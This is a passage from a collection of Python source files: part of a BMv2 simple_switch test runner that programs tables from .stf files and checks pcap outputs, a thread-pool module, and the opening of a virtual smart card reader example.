        return "lock_" + str(value)

    def release(self, value):
        """Drop the lock for `value` by removing its directory."""
        os.rmdir(self.lockName(value))

    def generate(self):
        """Try to claim a free integer in [0, max]; None after 10 failures.

        Directory creation is atomic, so a successful makedirs doubles as
        a cross-process mutex acquisition.
        """
        # try 10 times
        for i in range(0, 10):
            index = random.randint(0, self.max)
            file = self.lockName(index)
            try:
                os.makedirs(file)
                return index
            # Fix: was a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit; only directory-creation
            # failures (lock already held) should trigger a retry.
            except OSError:
                time.sleep(1)
                continue
        return None
class BMV2ActionArg(object):
    """Describes one runtime argument of a BMv2 action: its name and its
    width in bits."""
    def __init__(self, name, width):
        self.name = name
        self.width = width
class TableKey(object):
    """Ordered description of a table's key: maps field name -> match kind
    (exact/ternary/lpm/valid).  Field order must match the BMv2 JSON."""
    def __init__(self):
        self.fields = OrderedDict()
    def append(self, name, type):
        """Register the next key field; insertion order is significant."""
        self.fields[name] = type
class TableKeyInstance(object):
    """A concrete value assignment for every field of a TableKey."""
    def __init__(self, tableKey):
        assert isinstance(tableKey, TableKey)
        self.values = {}
        self.key = tableKey
        # Default every field to its "match anything" value.
        for f, t in tableKey.fields.items():  # items(): was iteritems(), Python-2-only
            if t == "ternary":
                self.values[f] = "0&&&0"
            elif t == "lpm":
                self.values[f] = "0/0"
            elif t == "exact":
                self.values[f] = "0"
            elif t == "valid":
                self.values[f] = "0"
            else:
                raise Exception("Unexpected key type " + t)
    def set(self, key, value):
        """Assign *value* to the (possibly abbreviated) field name *key*.

        Tries several rewrites to map an stf field name onto the JSON key
        name: array syntax a$3 -> a[3], trailing '$', '.$valid$' suffixes,
        and suffix matching of unqualified names.  Ternary and lpm fields
        convert the value into BMv2's mask/prefix syntax.
        """
        array = re.compile(r"(.*)\$([0-9]+)(.*)")  # raw string; stray ';' removed
        m = array.match(key)
        if m:
            key = m.group(1) + "[" + m.group(2) + "]" + m.group(3)
        found = False
        if key in self.key.fields:
            found = True
        elif key + '$' in self.key.fields:
            key = key + '$'
            found = True
        elif key + '.$valid$' in self.key.fields:
            key = key + '.$valid$'
            found = True
        elif key.endswith(".valid"):
            # hdr.valid -> hdr.$valid$ (key[:-5] keeps the trailing '.')
            alt = key[:-5] + "$valid$"
            if alt in self.key.fields:
                key = alt
                found = True
        if not found:
            # An unqualified name may refer to a fully-qualified field.
            for i in self.key.fields:
                if i.endswith("." + key) or i.endswith("." + key + "$"):
                    key = i
                    found = True
                elif key == "valid" and i.endswith(".$valid$"):
                    key = i
                    found = True
        if not found and key == "valid" and "$valid$" in self.key.fields:
            key = "$valid$"
            found = True
        if not found:
            raise Exception("Unexpected key field " + key)
        if self.key.fields[key] == "ternary":
            self.values[key] = self.makeMask(value)
        elif self.key.fields[key] == "lpm":
            self.values[key] = self.makeLpm(value)
        else:
            self.values[key] = value
    def makeMask(self, value):
        """Convert a value with '*' wildcard digits into 'value&&&mask' form."""
        # TODO -- we really need to know the size of the key to make the mask properly,
        # but to find that, we need to parse the headers and header_types from the json
        if value.startswith("0x"):
            mask = "F"
            value = value[2:]
            prefix = "0x"
        elif value.startswith("0b"):
            mask = "1"
            value = value[2:]
            prefix = "0b"
        elif value.startswith("0o"):
            mask = "7"
            value = value[2:]
            prefix = "0o"
        else:
            raise Exception("Decimal value "+value+" not supported for ternary key")
            # (an unreachable `return value` after this raise was removed)
        values = "0123456789abcdefABCDEF*"
        replacements = (mask * 22) + "0"
        trans = maketrans(values, replacements)
        m = value.translate(trans)
        return prefix + value.replace("*", "0") + "&&&" + prefix + m
    def makeLpm(self, value):
        """Convert a value into 'value/prefix-length' LPM form; '*' digits do
        not count toward the prefix length."""
        if value.find('/') >= 0:
            return value
        if value.startswith("0x"):
            bits_per_digit = 4
        elif value.startswith("0b"):
            bits_per_digit = 1
        elif value.startswith("0o"):
            bits_per_digit = 3
        else:
            # hex() already includes the "0x" prefix; the original prepended
            # another "0x", producing strings like "0x0xc".
            value = hex(int(value))
            bits_per_digit = 4
        digits = len(value) - 2 - value.count('*')
        return value.replace('*', '0') + "/" + str(digits*bits_per_digit)
    def __str__(self):
        # Emit values in key-field order, space-separated, for the CLI.
        result = ""
        for f in self.key.fields:
            if result != "":
                result += " "
            result += self.values[f]
        return result
class BMV2ActionArguments(object):
    """Holds concrete values for the runtime arguments of one BMV2Action."""
    def __init__(self, action):
        assert isinstance(action, BMV2Action)
        self.action = action
        self.values = {}
    def set(self, key, value):
        """Assign *value* to argument *key*; raises for unknown names."""
        known = any(arg.name == key for arg in self.action.args)
        if not known:
            raise Exception("Unexpected action arg " + key)
        self.values[key] = value
    def __str__(self):
        # Values in declaration order, space-separated, for the CLI.
        return " ".join(self.values[arg.name] for arg in self.action.args)
    def size(self):
        return len(self.action.args)
class BMV2Action(object):
    """Wraps one action from the compiled-program JSON: its name and the
    list of runtime arguments it expects."""
    def __init__(self, jsonAction):
        self.name = jsonAction["name"]
        self.args = [BMV2ActionArg(a["name"], a["bitwidth"])
                     for a in jsonAction["runtime_data"]]
    def __str__(self):
        return self.name
    def makeArgsInstance(self):
        """Create an empty argument-value holder for this action."""
        return BMV2ActionArguments(self)
class BMV2Table(object):
    """Wraps one table from the compiled-program JSON: its key layout and
    the mapping from action name to action id."""
    def __init__(self, jsonTable):
        self.match_type = jsonTable["match_type"]
        self.name = jsonTable["name"]
        self.key = TableKey()
        self.actions = {}
        for k in jsonTable["key"]:
            target = k["target"]
            if isinstance(target, list):
                # A list target is a fully-qualified field path.
                target = ".".join(target)
            self.key.append(target, k["match_type"])
        for action_name, action_id in zip(jsonTable["actions"],
                                          jsonTable["action_ids"]):
            self.actions[action_name] = action_id
    def __str__(self):
        return self.name
    def makeKeyInstance(self):
        """Create a default-valued key assignment for this table."""
        return TableKeyInstance(self.key)
# Represents enough about the program executed to be
# able to invoke the BMV2 simulator, create a CLI file
# and test packets in pcap files.
class RunBMV2(object):
    """Drives one BMv2 simple_switch run: creates pcap fifos for input
    traffic, starts the switch and its CLI, replays an .stf test file
    (table programming + packets), and checks the switch's output pcaps
    against the .stf expectations."""
    def __init__(self, folder, options, jsonfile):
        self.clifile = folder + "/cli.txt"
        self.jsonfile = jsonfile
        self.stffile = None
        self.folder = folder
        self.pcapPrefix = "pcap"
        self.interfaces = {}
        self.expected = {} # for each interface number of packets expected
        self.expectedAny = [] # interface on which any number of packets is fine
        self.packetDelay = 0
        self.options = options
        self.json = None
        self.tables = []
        self.actions = []
        self.switchLogFile = "switch.log" # .txt is added by BMv2
        self.readJson()
    def readJson(self):
        """Parse the compiled-program JSON into BMV2Action/BMV2Table wrappers."""
        with open(self.jsonfile) as jf:
            self.json = json.load(jf)
        for a in self.json["actions"]:
            self.actions.append(BMV2Action(a))
        # Tables come from both pipelines (ingress and egress).
        for t in self.json["pipelines"][0]["tables"]:
            self.tables.append(BMV2Table(t))
        for t in self.json["pipelines"][1]["tables"]:
            self.tables.append(BMV2Table(t))
    def filename(self, interface, direction):
        """Pcap path for traffic on *interface*; *direction* is 'in' or 'out'."""
        return self.folder + "/" + self.pcapPrefix + str(interface) + "_" + direction + ".pcap"
    def interface_of_filename(self, f):
        """Inverse of filename(): extract the interface number from a pcap path."""
        return int(os.path.basename(f).rstrip('.pcap').lstrip(self.pcapPrefix).rsplit('_', 1)[0])
    def do_cli_command(self, cmd):
        """Send one command to the running simple_switch_CLI process."""
        if self.options.verbose:
            print(cmd)
        self.cli_stdin.write(cmd + "\n")
        self.cli_stdin.flush()
        # Give the switch time to apply the change before more packets are sent.
        self.packetDelay = 1
    def do_command(self, cmd):
        """Execute one .stf line: add/setdefault program tables, packet
        injects data on an interface, expect records what should appear."""
        if self.options.verbose:
            print("STF Command:", cmd)
        first, cmd = nextWord(cmd)
        if first == "":
            pass
        elif first == "add":
            self.do_cli_command(self.parse_table_add(cmd))
        elif first == "setdefault":
            self.do_cli_command(self.parse_table_set_default(cmd))
        elif first == "packet":
            interface, data = nextWord(cmd)
            interface = int(interface)
            data = ''.join(data.split())
            time.sleep(self.packetDelay)
            try:
                self.interfaces[interface]._write_packet(HexToByte(data))
            except ValueError:
                reportError("Invalid packet data", data)
                return FAILURE
            self.interfaces[interface].flush()
            self.packetDelay = 0
        elif first == "expect":
            interface, data = nextWord(cmd)
            interface = int(interface)
            data = ''.join(data.split())
            if data != '':
                self.expected.setdefault(interface, []).append(data)
            else:
                # Bare `expect N`: any packets on interface N are acceptable.
                self.expectedAny.append(interface)
        else:
            if self.options.verbose:
                print("ignoring stf command:", first, cmd)
    def parse_table_set_default(self, cmd):
        """Translate 'setdefault table action(args)' into a CLI command."""
        tableName, cmd = nextWord(cmd)
        table = self.tableByName(tableName)
        actionName, cmd = nextWord(cmd, "(")
        action = self.actionByName(table, actionName)
        actionArgs = action.makeArgsInstance()
        cmd = cmd.strip(")")
        while cmd != "":
            word, cmd = nextWord(cmd, ",")
            k, v = nextWord(word, ":")
            actionArgs.set(k, v)
        command = "table_set_default " + tableName + " " + actionName
        if actionArgs.size():
            command += " => " + str(actionArgs)
        return command
    def parse_table_add(self, cmd):
        """Translate 'add table [prio] key-fields action(args)' into a CLI command."""
        tableName, cmd = nextWord(cmd)
        table = self.tableByName(tableName)
        key = table.makeKeyInstance()
        actionArgs = None
        actionName = None
        prio, cmd = nextWord(cmd)
        number = re.compile("[0-9]+")
        if not number.match(prio):
            # not a priority; push back
            cmd = prio + " " + cmd
            prio = ""
        while cmd != "":
            if actionName != None:
                # parsing action arguments
                word, cmd = nextWord(cmd, ",")
                k, v = nextWord(word, ":")
                actionArgs.set(k, v)
            else:
                # parsing table key
                word, cmd = nextWord(cmd)
                if cmd.find("=") >= 0:
                    # This command retrieves a handle for the key
                    # This feature is currently not supported, so we just ignore the handle part
                    cmd = cmd.split("=")[0]
                if word.find("(") >= 0:
                    # found action
                    actionName, arg = nextWord(word, "(")
                    action = self.actionByName(table, actionName)
                    actionArgs = action.makeArgsInstance()
                    cmd = arg + cmd
                    cmd = cmd.strip("()")
                else:
                    k, v = nextWord(word, ":")
                    key.set(k, v)
        if prio != "":
            # Priorities in BMV2 seem to be reversed with respect to the stf file
            # Hopefully 10000 is large enough
            prio = str(10000 - int(prio))
        command = "table_add " + tableName + " " + actionName + " " + str(key) + " => " + str(actionArgs)
        if table.match_type == "ternary":
            command += " " + prio
        return command
    def actionByName(self, table, actionName):
        """Resolve an action name through the table's action-id map."""
        action_id = table.actions[actionName]  # was `id`, which shadowed a builtin
        return self.actions[action_id]
    def tableByName(self, tableName):
        """Find a table wrapper by name; raises if the program has no such table."""
        for t in self.tables:
            if t.name == tableName:
                return t
        raise Exception("Could not find table " + tableName)
    def interfaceArgs(self):
        # return list of interface names suitable for bmv2
        result = []
        for interface in sorted(self.interfaces):
            result.append("-i " + str(interface) + "@" + self.pcapPrefix + str(interface))
        return result
    def generate_model_inputs(self, stffile):
        """Scan the .stf file and create one input fifo per referenced interface."""
        self.stffile = stffile
        with open(stffile) as i:
            for line in i:
                line, comment = nextWord(line, "#")
                first, cmd = nextWord(line)
                if first == "packet" or first == "expect":
                    interface, cmd = nextWord(cmd)
                    interface = int(interface)
                    if not interface in self.interfaces:
                        # Can't open the interfaces yet, as that would block
                        ifname = self.interfaces[interface] = self.filename(interface, "in")
                        os.mkfifo(ifname)
        return SUCCESS
    def check_switch_server_ready(self, proc, thriftPort):
        """While the process is running, we check if the Thrift server has been
        started. If the Thrift server is ready, we assume that the switch was
        started successfully. This is only reliable if the Thrift server is
        started at the end of the init process"""
        while True:
            if proc.poll() is not None:
                return False
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(0.5)
            result = sock.connect_ex(("localhost", thriftPort))
            sock.close()  # fix: one socket per probe was leaked previously
            if result == 0:
                return True
    def run(self):
        """Start simple_switch and its CLI, replay the .stf file, then shut
        both down.  Returns SUCCESS or FAILURE."""
        if self.options.verbose:
            print("Running model")
        wait = 0 # Time to wait before model starts running
        # Claim a process-exclusive offset so concurrent runs get distinct
        # Thrift ports and device ids.
        concurrent = ConcurrentInteger(os.getcwd(), 1000)
        rand = concurrent.generate()
        if rand is None:
            reportError("Could not find a free port for Thrift")
            return FAILURE
        thriftPort = str(9090 + rand)
        rv = SUCCESS
        try:
            os.remove("/tmp/bmv2-%d-notifications.ipc" % rand)
        except OSError:
            pass
        try:
            runswitch = [FindExe("behavioral-model", "simple_switch"),
                         "--log-file", self.switchLogFile, "--log-flush",
                         "--use-files", str(wait), "--thrift-port", thriftPort,
                         "--device-id", str(rand)] + self.interfaceArgs() + ["../" + self.jsonfile]
            if self.options.verbose:
                print("Running", " ".join(runswitch))
            sw = subprocess.Popen(runswitch, cwd=self.folder)
            def openInterface(interface, ifname):
                # fix: take `interface` as a parameter instead of silently
                # capturing the loop variable from the enclosing scope
                fp = self.interfaces[interface] = RawPcapWriter(ifname, linktype=0)
                fp._write_header(None)
            # Try to open input interfaces. Each time, we set a 2 second
            # timeout. If the timeout expires we check if the bmv2 process is
            # not running anymore. If it is, we check if we have exceeded the
            # one minute timeout (exceeding this timeout is very unlikely and
            # could mean the system is very slow for some reason). If one of the
            # 2 conditions above is met, the test is considered a FAILURE.
            start = time.time()
            sw_timeout = 60
            # open input interfaces
            # DANGER -- it is critical that we open these fifos in the same
            # order as bmv2, as otherwise we'll deadlock. Would be nice if we
            # could open nonblocking.
            for interface in sorted(self.interfaces):
                ifname = self.interfaces[interface]
                while True:
                    try:
                        signal.alarm(2)
                        openInterface(interface, ifname)
                        signal.alarm(0)
                    except TimeoutException:
                        if time.time() - start > sw_timeout:
                            return FAILURE
                        if sw.poll() is not None:
                            return FAILURE
                    else:
                        break
            # at this point we wait until the Thrift server is ready
            # also useful if there are no interfaces
            try:
                signal.alarm(int(sw_timeout + start - time.time()))
                self.check_switch_server_ready(sw, int(thriftPort))
                signal.alarm(0)
            except TimeoutException:
                return FAILURE
            time.sleep(0.1)
            runcli = [FindExe("behavioral-model", "simple_switch_CLI"), "--thrift-port", thriftPort]
            if self.options.verbose:
                print("Running", " ".join(runcli))
            cli = subprocess.Popen(runcli, cwd=self.folder, stdin=subprocess.PIPE)
            self.cli_stdin = cli.stdin
            with open(self.stffile) as i:
                for line in i:
                    line, comment = nextWord(line, "#")
                    self.do_command(line)
            cli.stdin.close()
            for interface, fp in self.interfaces.items():  # fix: iteritems() is Python-2-only
                fp.close()
            # Give time to the model to execute
            time.sleep(2)
            cli.terminate()
            sw.terminate()
            sw.wait()
            # This only works on Unix: negative returncode is
            # minus the signal number that killed the process.
            if sw.returncode != 0 and sw.returncode != -15: # 15 is SIGTERM
                reportError("simple_switch died with return code", sw.returncode)
                rv = FAILURE
            elif self.options.verbose:
                print("simple_switch exit code", sw.returncode)
            cli.wait()
            if cli.returncode != 0 and cli.returncode != -15:
                reportError("CLI process failed with exit code", cli.returncode)
                rv = FAILURE
        finally:
            try:
                os.remove("/tmp/bmv2-%d-notifications.ipc" % rand)
            except OSError:
                pass
            concurrent.release(rand)
        if self.options.verbose:
            print("Execution completed")
        return rv
    def comparePacket(self, expected, received):
        """Compare hex strings; '*' in *expected* matches any nibble."""
        received = ''.join(ByteToHex(str(received)).split()).upper()
        expected = ''.join(expected.split()).upper()
        if len(received) < len(expected):
            reportError("Received packet too short", len(received), "vs", len(expected))
            return FAILURE
        for i in range(0, len(expected)):
            if expected[i] == "*":
                continue
            if expected[i] != received[i]:
                reportError("Packet different at position", i, ": expected", expected[i], ", received", received[i])
                return FAILURE
        return SUCCESS
    def showLog(self):
        """Dump the switch's log file to stdout (used on failure)."""
        with open(self.folder + "/" + self.switchLogFile + ".txt") as a:
            log = a.read()
            print("Log file:")
            print(log)
    def checkOutputs(self):
        """Compare every output pcap with the .stf 'expect' records."""
        if self.options.verbose:
            print("Comparing outputs")
        direction = "out"
        for file in glob(self.filename('*', direction)):
            interface = self.interface_of_filename(file)
            if os.stat(file).st_size == 0:
                packets = []
            else:
                try:
                    packets = rdpcap(file)
                except Exception:  # fix: bare except also swallowed SystemExit etc.
                    reportError("Corrupt pcap file", file)
                    self.showLog()
                    return FAILURE
            # Log packets.
            if self.options.observationLog:
                # NOTE(review): opened with 'w' inside the per-interface loop,
                # so only the last interface's packets survive -- confirm
                # whether appending across interfaces was intended.
                observationLog = open(self.options.observationLog, 'w')
                for pkt in packets:
                    observationLog.write('%d %s\n' % (
                        interface,
                        ''.join(ByteToHex(str(pkt)).split()).upper()))
                observationLog.close()
            # Check for expected packets.
            if interface in self.expectedAny:
                if interface in self.expected:
                    # fix: `interface` is an int; concatenating it to a str
                    # raised TypeError in the original
                    reportError("Interface " + str(interface) + " has both expected with packets and without")
                continue
            if interface not in self.expected:
                expected = []
            else:
                expected = self.expected[interface]
            if len(expected) != len(packets):
                reportError("Expected", len(expected), "packets on port", str(interface),
                            "got", len(packets))
                self.showLog()
                return FAILURE
            for i in range(0, len(expected)):
                cmp = self.comparePacket(expected[i], packets[i])
                if cmp != SUCCESS:
                    reportError("Packet", i, "on port", str(interface), "differs")
                    return FAILURE
            # remove successfully checked interfaces
            if interface in self.expected:
                del self.expected[interface]
        if len(self.expected) != 0:
            # didn't find all the expects we were expecting
            reportError("Expected packects on ports", list(self.expected.keys()), "not received")
            return FAILURE
        else:
            return SUCCESS
def run_model(options, tmpdir, jsonfile, testfile):
    """Run one complete simulation: prepare inputs, execute BMv2, and check
    the outputs.  Stops at (and returns) the first non-SUCCESS result."""
    bmv2 = RunBMV2(tmpdir, options, jsonfile)
    result = bmv2.generate_model_inputs(testfile)
    if result == SUCCESS:
        result = bmv2.run()
    if result == SUCCESS:
        result = bmv2.checkOutputs()
    return result
######################### main
def usage(options):
    """Print the command-line synopsis, naming the binary that was invoked."""
    print("usage:", options.binary,
          "[-v] [-observation-log <file>] <json file> <stf file>")
def main(argv):
    """Entry point: parse options, run one json/stf test, clean up the tmpdir."""
    options = Options()
    options.binary = argv[0]
    argv = argv[1:]
    # Consume leading '-' options; everything left afterwards is positional.
    while len(argv) > 0 and argv[0][0] == '-':
        if argv[0] == "-b":
            options.preserveTmp = True
        elif argv[0] == "-v":
            options.verbose = True
        elif argv[0] == '-observation-log':
            if len(argv) == 1:
                reportError("Missing argument", argv[0])
                usage(options)
                sys.exit(1)
            options.observationLog = argv[1]
            # This shift consumes the filename; the shift at the end of the
            # loop body consumes the option flag itself.
            argv = argv[1:]
        else:
            # Unknown options are reported and skipped, not fatal.
            reportError("Unknown option ", argv[0])
            usage(options)
        argv = argv[1:]
    if len(argv) < 2:
        usage(options)
        return FAILURE
    if not os.path.isfile(argv[0]) or not os.path.isfile(argv[1]):
        usage(options)
        return FAILURE
    # Each run gets a private scratch directory under the cwd.
    tmpdir = tempfile.mkdtemp(dir=".")
    result = run_model(options, tmpdir, argv[0], argv[1])
    if options.preserveTmp:
        print("preserving", tmpdir)
    else:
        shutil.rmtree(tmpdir)
    if options.verbose:
        if result == SUCCESS:
            print("SUCCESS")
        else:
            print("FAILURE", result)
    return result
if __name__ == "__main__":
    sys.exit(main(sys.argv))
|
threads.py
|
from abots.helpers import eprint, cast
from abots.events import Every
from queue import Queue, Empty, Full
from threading import Thread, Event, Lock, RLock, BoundedSemaphore
from contextlib import contextmanager
"""
TODO:
"""
@contextmanager
def acquire_timeout(lock, timeout=-1):
    """Context manager: acquire *lock* with a timeout; yields True on success.

    timeout: seconds to wait; None or -1 means wait forever.
    The lock is released on exit only if it was actually acquired.
    """
    if timeout is None:
        timeout = -1
    result = lock.acquire(timeout=timeout)
    try:
        yield result
    finally:
        # fix: the original released outside try/finally, so an exception in
        # the `with` body leaked the lock forever.
        if result:
            lock.release()
class ThreadPool:
    """Fixed-size pool of daemon worker threads, one queue per worker.

    A job is a 2-tuple (controls, task); task is (method, args, kwargs) or
    None as a poison pill that stops the worker.  controls maps an action
    name (e.g. "set", "release") to a list of objects the action is invoked
    on (via abots' cast) once the task finishes.
    """
    def __init__(self, pool_size, timeout=None):
        self.locks = list()
        self.events = list()
        self.queues = list()
        self.workers = list()
        for s in range(pool_size):
            lock = Lock()
            event = Event()
            queue = Queue()
            args = (s, event, queue, timeout)
            worker = Thread(target=self._worker, args=args)
            # daemon=True so stuck workers never block interpreter shutdown.
            # (fix: setDaemon() is deprecated in favor of the attribute;
            # the unused local `data = dict()` was also removed.)
            worker.daemon = True
            self.locks.append(lock)
            self.events.append(event)
            self.queues.append(queue)
            self.workers.append(worker)
            worker.start()
    def _exec_controls(self, controls):
        # Apply each action ("set", "release", ...) to every object listed
        # for it; cast() ignores objects lacking the method.
        for action, methods in controls.items():
            for method in methods:
                cast(method, action)
    def _worker(self, worker_id, event, queue, timeout=None):
        """Worker loop: run jobs until the stop event is set or a poison pill
        (task is None) arrives, then drain the queue.

        With timeout=None the loop polls with get_nowait (busy-spins); pass a
        small timeout to block between jobs instead.
        """
        while not event.is_set():
            try:
                # NOTE: This is really spammy, use only in case of emergencies
                # print(f"[worker:{worker_id}]: Getting task")
                if timeout is not None:
                    job = queue.get(block=True, timeout=timeout)
                else:
                    job = queue.get_nowait()
                if len(job) != 2:
                    # print(f"[worker:{worker_id}]: Job is malformed")
                    continue
                controls, task = job
                if type(controls) != dict:
                    # print(f"[worker:{worker_id}]: Controls are malformed")
                    continue
                if task is None: # NOTE: Poison pill to kill worker
                    # print(f"[worker:{worker_id}]: Poisoned")
                    event.set()
                    self._exec_controls(controls)
                    break
                if len(task) != 3:
                    # print(f"[worker:{worker_id}]: Task is malformed")
                    self._exec_controls(controls)
                    continue
                method, args, kwargs = task
                # print(f"[worker:{worker_id}]: Running task")
                try:
                    method(*args, **kwargs)
                except Exception as e:
                    print(e)
                finally:
                    # print(f"[worker:{worker_id}]: Task complete")
                    self._exec_controls(controls)
                    queue.task_done()
            except Empty:
                continue
        # Clear out the queue
        # print(f"[worker:{worker_id}]: Clearing out queue")
        while True:
            try:
                queue.get_nowait()
                queue.task_done()
            except Empty:
                break
    def stop(self, done=None, wait=True):
        """Signal every worker to stop; optionally join them, then fire *done*."""
        # print(f"Stopping pool")
        for event in self.events:
            event.set()
        if wait:
            for worker in self.workers:
                worker.join()
        cast(done, "set")
        # print(f"Stopped pool")
class ThreadMarshal:
    """Manages a growable collection of ThreadPools, dispatching tasks to
    free workers and (optionally) reaping idle pools from a monitor thread."""
    def __init__(self, pool_size, monitor=1, cleanup=True, timeout=None,
                 destroy=False):
        self.pool_size = pool_size
        self.monitor_interval = monitor
        self.cleanup = cleanup
        self.timeout = timeout
        self.destroy = destroy
        self.stopped = Event()
        self._manager = Lock() # NOTE: Maybe make this an RLock?
        self._load_presets()
        self._add_pool()
        if self.monitor_interval > 0:
            self.monitor = Every(self.monitor_interval, self._monitor)
            self.monitor.start()
    def _next_pool(self):
        # Advance the round-robin pool cursor.
        self._pool_cursor = (self._pool_cursor + 1) % len(self.pools)
    def _next_worker(self):
        # Advance the round-robin worker cursor within a pool.
        self._worker_cursor = (self._worker_cursor + 1) % self.pool_size
        # NOTE: This is a potential optimization for later
        # if self._worker_cursor == 0:
        #     self._next_pool()
    def _load_presets(self):
        """Reset all cursors and bookkeeping lists to the empty state."""
        self._pool_cursor = 0
        self._worker_cursor = 0
        self.pools = list()
        self.locks = list()
        self.events = list()
        self.queues = list()
        self.workers = list()
        self.semaphores = list()
    def _get_idle_pools(self):
        """Return pools whose queues are all empty; pool 0 is never reaped."""
        idle_pools = list()
        if len(self.pools) == 1:
            return idle_pools
        for index, queues in enumerate(self.queues):
            if index == 0:
                continue
            queues_empty = [queue.empty() for queue in queues]
            idle = all(queues_empty)
            if not idle:
                continue
            print(f"[manager] Pool {index} is idle")
            idle_pools.append(self.pools[index])
        return idle_pools
    def _monitor(self, state):
        """Periodic callback: destroy everything once fully idle (if destroy),
        otherwise clean up idle pools (if cleanup)."""
        # print("[manager] Cleaning pools")
        if self._manager.locked():
            return # Try again later
        with self._manager:
            idle_pools = self._get_idle_pools()
            if self.destroy and len(idle_pools) == len(self.pools):
                self.stop()
            elif self.cleanup and len(idle_pools) > 0:
                cleaning = Event()
                self._cleaner(idle_pools, cleaning)
                cleaning.wait()
        return None
    def _cleaner(self, idle_pools, done=None):
        """Stop every pool in *idle_pools*, then fire *done*."""
        print("[manager] Cleaning pools")
        for pool in idle_pools:
            self._stop_pool(pool, wait=done is not None)
        print("[manager] Pools are cleaned")
        cast(done, "set")
    def _stop_pool(self, pool, done=None, wait=True):
        """Deregister *pool* and all of its bookkeeping, then stop it."""
        index = self.pools.index(pool)
        # print(f"[manager] Stopping pool {index}")
        lock = self.locks[index]
        event = self.events[index]
        queue = self.queues[index]
        worker = self.workers[index]
        semaphore = self.semaphores[index]
        self.pools.remove(pool)
        self.locks.remove(lock)
        self.events.remove(event)
        self.queues.remove(queue)
        self.workers.remove(worker)
        self.semaphores.remove(semaphore)
        pool.stop(done, wait)
        # print(f"[manager] Stopped pool {index}")
    def _run(self, task, controls, reserve, coordinates):
        """Queue *task* on the worker at *coordinates*; False if it is busy.

        When reserve is True the worker's pool-level lock is held until the
        controls' "release" action fires; otherwise a throwaway lock is used.
        """
        pool_index, worker_index = coordinates
        # print(f"[manager:reserve] Trying worker {worker_index}")
        lock = self.locks[pool_index][worker_index]
        event = self.events[pool_index][worker_index]
        queue = self.queues[pool_index][worker_index]
        if event.is_set() or lock.locked():
            return False
        if not reserve:
            lock = Lock()
        # print(f"[manager:reserve] Using worker {worker_index}")
        lock.acquire()
        # fix: controls.get() returned a list that was never stored back when
        # "release" was absent, so the lock would never be released.
        controls.setdefault("release", list()).append(lock)
        job = controls, task
        queue.put_nowait(job)
        return True
    def _add_pool(self):
        """Create a new ThreadPool and register its bookkeeping; return its index."""
        index = len(self.pools)
        # print(f"[manager] Adding pool {index}")
        pool = ThreadPool(self.pool_size, self.timeout)
        self.pools.append(pool)
        self.locks.append(pool.locks)
        self.events.append(pool.events)
        self.queues.append(pool.queues)
        self.workers.append(pool.workers)
        self.semaphores.append(BoundedSemaphore(self.pool_size))
        return index
    def add_pool(self):
        with self._manager:
            self._add_pool()
    def clean(self, done=None):
        """Explicitly reap idle pools (same policy as the monitor)."""
        with self._manager:
            idle_pools = self._get_idle_pools()
            if self.cleanup and len(idle_pools) > 0:
                self._cleaner(idle_pools, done)
    def wait(self):
        """Block until every worker thread in every pool has exited."""
        # print("[manager] Waiting on workers in pools")
        with self._manager:
            for pool in self.pools:
                for worker in pool.workers:
                    worker.join()
    def stop(self, wait=True):
        """Stop the monitor and all pools (each on its own thread), then
        reset to the empty state and fire self.stopped."""
        # print("[manager] Stopping")
        if self.monitor_interval > 0:
            self.monitor.event.set()
        with self._manager:
            dones = list()
            threads = list()
            for pool in self.pools:
                done = Event()
                dones.append(done)
                thread = Thread(target=pool.stop, args=(done, wait))
                thread.daemon = True  # setDaemon() is deprecated
                threads.append(thread)
                thread.start()
            if wait:
                for thread in threads:
                    thread.join(self.timeout)
            self._load_presets()
        cast(self.stopped, "set")
        # print("[manager] Stopped")
    def run(self, task, done, reserve, coordinates):
        """Queue *task* on an explicit (pool, worker) coordinate.

        Returns True when queued; None when the arguments are malformed or
        the target pool is saturated.
        """
        if len(task) != 3:
            return None
        if len(coordinates) != 2:
            return None
        method, args, kwargs = task
        if not callable(method) or type(args) != tuple or type(kwargs) != dict:
            return None
        pool_index, worker_index = coordinates
        if pool_index >= len(self.pools) or worker_index >= self.pool_size:
            return None
        with self._manager:  # fix: was `self.manager`, an AttributeError
            semaphore = self.semaphores[pool_index]
            if not semaphore.acquire(False):
                return None
            controls = dict()
            controls["set"] = [done]
            controls["release"] = [semaphore]  # fix: was misspelled `sempahore`
            self._run(task, controls, reserve, coordinates)
        return True
    def reserve(self, method, args=tuple(), kwargs=dict(), reserve=True):
        """Queue method(*args, **kwargs) on the next free worker, growing the
        pool set when all are saturated; returns an Event set on completion."""
        # print("[manager:reserve] Acquiring lock")
        done = Event()
        with self._manager:
            task = method, args, kwargs
            if self._pool_cursor >= len(self.pools):
                self._next_pool()
            pool_found = False
            for p in range(len(self.pools)):
                # print(f"[manager:reserve] Trying pool {self._pool_cursor}")
                semaphore = self.semaphores[self._pool_cursor]
                if not semaphore.acquire(False):
                    self._next_pool()
                    continue
                pool_found = True
                break
            if not pool_found:
                # print(f"[manager:reserve] Pools are full, adding new pool")
                index = self._add_pool()
                self._pool_cursor = index
                self._worker_cursor = 0
                semaphore = self.semaphores[self._pool_cursor]
                semaphore.acquire()
            # print(f"[manager:reserve] Using pool {self._pool_cursor}")
            for w in range(self.pool_size):
                coordinates = (self._pool_cursor, self._worker_cursor)
                controls = dict()
                controls["set"] = [done]
                controls["release"] = [semaphore]
                queued = self._run(task, controls, reserve, coordinates)
                self._next_worker()
                if not queued:
                    continue
                break
        return done
|
vicc-vpcdHost.py
|
"""
Example Virtual Smart Card Reader aka Virtual Proximity Coupling Device (vpcd) application to run the WebSocketServerVICC example.
It waits for a socket connecting virtual smart card aka Virtual Integrated Circuit Card (vicc) and sends a GET_CHALLENGE(1) CAPDU (command application protocol data unit).
Example exchange:
vicc<--vpcd<--app<--CAPDU
RAPDU-->vicc-->vpcd-->app
[https://frankmorgner.github.io/vsmartcard/virtualsmartcard/api.html#virtualsmartcard-api]
"""
import socket
import threading
# TCP listening socket on which vicc clients connect (see module docstring).
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(('', 35963)) # 35963: the vpcd port used by this example, on all interfaces
s.listen()
def clienthandler(conn, addr):
    """Serve one vicc connection: send a single GET CHALLENGE CAPDU and
    print the hex dump of the RAPDU that comes back.

    conn: connected socket; addr: (host, port) pair, used for logging only.
    """
    # CAPDU = 2 Bytes apdu length (bigendian), and following apdu. Apdu is an
    # extended length get_challenge expecting one random byte in the response
    # apdu (RAPDU).
